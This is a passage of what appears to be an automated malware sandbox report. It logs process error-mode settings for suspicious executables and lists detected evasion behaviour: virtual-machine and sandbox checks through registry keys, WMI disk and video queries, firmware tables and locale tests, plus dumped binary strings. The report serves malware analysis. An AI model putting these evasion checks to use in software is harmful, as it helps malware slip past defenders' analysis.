Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: i1crvbOZAP.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: g1nHVnlr2tXTEWQsRz_M547D.exe PID: 7640, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_12-87281

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: 